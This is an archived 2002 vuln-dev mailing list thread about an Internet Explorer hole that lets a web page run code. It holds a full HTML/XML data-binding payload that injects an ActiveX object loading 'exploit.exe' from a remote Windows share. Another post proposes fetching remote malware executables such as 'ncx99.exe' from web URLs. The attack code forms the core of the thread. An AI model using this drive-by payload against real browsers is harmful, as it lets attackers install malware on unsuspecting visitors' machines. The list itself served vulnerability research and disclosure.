RE: Rather large MSIE-hole

From: John Swensson (jswensson@integres.com)
Date: 03/15/02 

Date: Thu, 14 Mar 2002 16:23:55 -0800
From: "John Swensson" <jswensson@integres.com>
To: "KF" <dotslash@snosoft.com>, <vuln-dev@security-focus.com>

well if activex is enabled,

doing this with a available readable by everyone windows share works

<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec">
    <security>
        <exploit>
            <![CDATA[
            <object id="oFile"
classid="clsid:11111111-1111-1111-1111-111111111111"
codebase="\\xxx.xxx.xxx.xxx\share\exploit.exe"></object>
            ]]>
        </exploit>
    </security>
</xml>

-john

jswensson@integres.com

>-----Original Message-----
>From: KF [mailto:dotslash@snosoft.com]
>Sent: Thursday, March 14, 2002 2:48 PM
>To: vuln-dev@security-focus.com
>Subject: Re: Rather large MSIE-hole
>
>
>Another thought... will this bug run an executable from a web page? If
>so you could just make your own binary to do whatever you wanted. Like
>http://mysiteathome.com/malware.exe or something along those lines. I
>would HOPE that it asks to save the file to disk or even better ignore
>it all together. Maybe try something like:
>
>var programName=new Array(
> 'http://mysiteathome.com/ncx99.exe',
> 'http://someothersite.com/ncx99.exe',
>);
>
>I would do this myself but I don't have any windows boxen to test.
>-KF
>
>
>Paul D. Campbell wrote:
>
>>>Could you not create a batch file that housed the commands you wanted
>>>to run
>>>(with args) and just run the batch file?
>>>I apologise if someone has already addressed this.
>>>
>>>-Eric
>>>
>>
>>You would probably be able to do this. However, you would first need
>>to place the batch file on the target machine. Then you would have to
>>sit around and hope the user visits your malicious site. Though, if
>>you have the capability to write to someone's harddrive you could do
>>something much nastier than this :)
>>
>>Paul
>>
>>
>
>
>
>

Relevant Pages

  • Re: Fix for: Server Application Unavailable Error after Applying Security Update for IE
    ... I've run the batch file, and now the login is failing for aspnet. ... > Internet Explorer security patch and ASP.NET V1.0 running on Windows XP. ... > Deletes and recreates the ASPNET account with a known temporary password ... This creates a new random password for the account ...
    (microsoft.public.dotnet.framework.aspnet.security)
  • Re: Subst question
    ... > In a batch file, the @ symbol at the beginning of a line will hide the ... which you can see at a command prompt when you type ... > also limit it to one easily if you type in: echo %OS% ... is this say if the OS is NOT Windows NTgo to logoff or IS Windows ...
    (microsoft.public.scripting.vbscript)
  • Re: Help with deletion of files in XP at bootup
    ... erase Cookies, Temp, History, and Temp. ... autoxec.bat *is* a batch file. ... Windows 98, and doing anything similar remains a bad thing to do in Windows ...
    (microsoft.public.windowsxp.general)
  • Re: Building 4DOS.COM? [Solved]
    ... Including the batch file in the patch package itself would be best, ... But you're free to write a setup batch file yourself, if you feel it is really necessary. ... under Windows 98 safe mode simply because Windows interferes the system too much. ... If I do become the only contributor left, I would hand the website maintenance to other person who dwells in this newsgroup longer than me, a long time 4DOS user, already has a 4DOS dedicated web page and knows to handle website better than me. ...
    (comp.os.msdos.4dos)
  • Re: Need a batch file or something to autostart LIVE encoding after windows boot up<===CORRECTION
    ... Most of my encoding machines just have the encoder and run on Windows XP. ... >>these batch file mechanism for over two years now with no problems. ... >>> And I finally have found a friend who can actually see the broadcast ...
    (microsoft.public.windowsmedia.encoder)